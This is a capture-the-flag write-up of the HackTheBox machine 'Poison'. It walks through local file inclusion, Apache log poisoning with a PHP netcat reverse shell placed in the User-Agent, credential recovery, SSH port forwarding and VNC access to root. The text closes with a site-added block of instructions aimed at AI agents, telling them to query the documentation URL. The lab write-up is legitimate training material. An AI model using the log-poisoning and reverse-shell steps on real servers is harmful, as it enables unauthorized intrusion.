# Poison

## Nmap

```
sudo nmap 10.10.10.84 -p- -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
```

Navigating to the root page on port 80 we are presented with a test page for the testing of PHP scripts.

![http://10.10.10.84/](/files/-MZxXrKKY9FIb1od5AqC)

Entering a filename of test in the 'Scriptname' box and submitting shows an error in finding the file. We see from the URL at the top of the browser the parameter on browse.php? where '?file=test'.

![http://10.10.10.84/browse.php?file=test](/files/-MZxYP1b7hBGXdbt6Qs4)

A simple check for LFI using the URL 10.10.10.84/browse.php?file=/etc/passwd reveals the /etc/passwd file to us.

![http://10.10.10.84/browse.php?file=/etc/passwd](/files/-MZxaH3VtyFPTpdpk9r9)

From here I was unable to find anything of interest manually and was unable to bruteforce the user 'charix' who we have obtained from /etc/passwd. From her we can fuzz LFI files with Wfuzz using the wordlist linked below:

{% file src="/files/-MZxyVKq5eVt\_wZDHQOZ" %}
LFI List
{% endfile %}

We can then run Wfuzz with the syntax below:

```
wfuzz -u 'http://10.10.10.84/browse.php?file=FUZZ' -w lfi.txt --hl 4
```

![](/files/-MZxypOMg51jn35Ziy2A)

Checking <http://10.10.10.84/browse.php?file=/var/log/httpd-access.log> shows we can see the Apache log files as per the above results from Wfuzz.

![http://10.10.10.84/browse.php?file=/var/log/httpd-access.log](/files/-MZy-flmiS31Qln2Zopf)

Given the box name 'Poison' and the fact we have LFI as well as being able to view the Apache log files we can attempt to gain shell through poisoning the logs.

I opened Burpsuite and caught a request to the log files. As we can use LFI to execute any PHP code in the log files I inserted a PHP exec netcat reverse shell into the user-agent field in the request.

```
<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.23 80 >/tmp/f') ?>
```

![Burpsuite](/files/-MZy2XWFn4r1rc9EB7Of)

After sending the request set up a `netcat` listener and then use curl to perform LFI on the log files.

`netcat`:

```
sudo nc -lvp 80
```

Then executing curl.

```
curl http://10.10.10.84/browse.php?file=/var/log/httpd-access.log
```

This will give us shell access onto the target machine.

![](/files/-MZy2zWFBUlM5n-8Hz5x)

Using `ls -la` shows we have a pwdbackup.txt file in the current directory.

![](/files/-MZy3Z1JwjAiOxw7VlgB)

The contents of this file is shown below:

![](/files/-MZy3nOlrl2J6Dip_L0W)

I used the following website to decode the string 13 times: [https://www.base64decode.org/](https://www.base64decode.org). Before retrieving the end result of: `Charix!2#4%6&8(0`

Knowing that charix is a user on the target machine and that SSH is open we can try the credentials.

![](/files/-MZy5Lgjvb9j9L_NA-VT)

Checking the current directory we have a user flag and a secret.zip. I then used the command below with `scp` to transfer the secret.zip file back to my attacking machine.

```
scp charix@10.10.10.84:/home/charix/secret.zip ./
```

![](/files/-MZyAjerLn4nFPEVZ1eH)

After this completed I attempted to extract the secret.zip and was prompted for a password. I used charix's password in hope for password reuse and was able to open the zip file. Attempting to read the contents of secret.zip shows we can only see a string that is not readable.

![](/files/-MZyBDB0FzejgoleIAoX)

Moving on and doing some more basic manual enumeration we have an interesting process running in the context of the root user.

```
ps aux | grep root
```

![](/files/-MZy5hbGHv9qM3msi08d)

The root account is currently running Xvnc. We can see from the image above we cannot see all the output of `ps` so we need to run again and allow for more columns to view all information.

```
ps -auxww | grep Xvnc
```

![](/files/-MZyCHZyeYm0kZ5QD_jO)

We can see from the above the service appears to be using port 5901. Looking back at the initial `nmap` scan this port will need forwarding so we can access it.

As we have SSH credentials we can use this to forward the local port of 5901 to a port on our attacking machine.

```
ssh -L 4444:127.0.0.1:5901 charix@10.10.10.84
```

Once connected again we can run `nmap` against our local port of 4444 to see if this has worked.

![](/files/-MZyDs9sX-CzWsvb_u4f)

Kali comes preinstalled with `vncviewer` which we will use in an attempt to connect to VNC.

```
vncviewer 127.0.0.1::4444 
```

We see once connected we are prompted for a password. I tried charix's password and a few common easy ones with no luck.

![](/files/-MZyEjcDYuFWbYMNhta7)

Looking at the `-h` options for `vncviewer` we notice we can provide a password file. I tried the secret.txt from earlier and was given access.

```
vncviewer 127.0.0.1::4444 -passwd ~/secret   
```

![](/files/-MZyF7bEmTyLKDYnzbYy)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/writeups/hackthebox/linux/poison.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.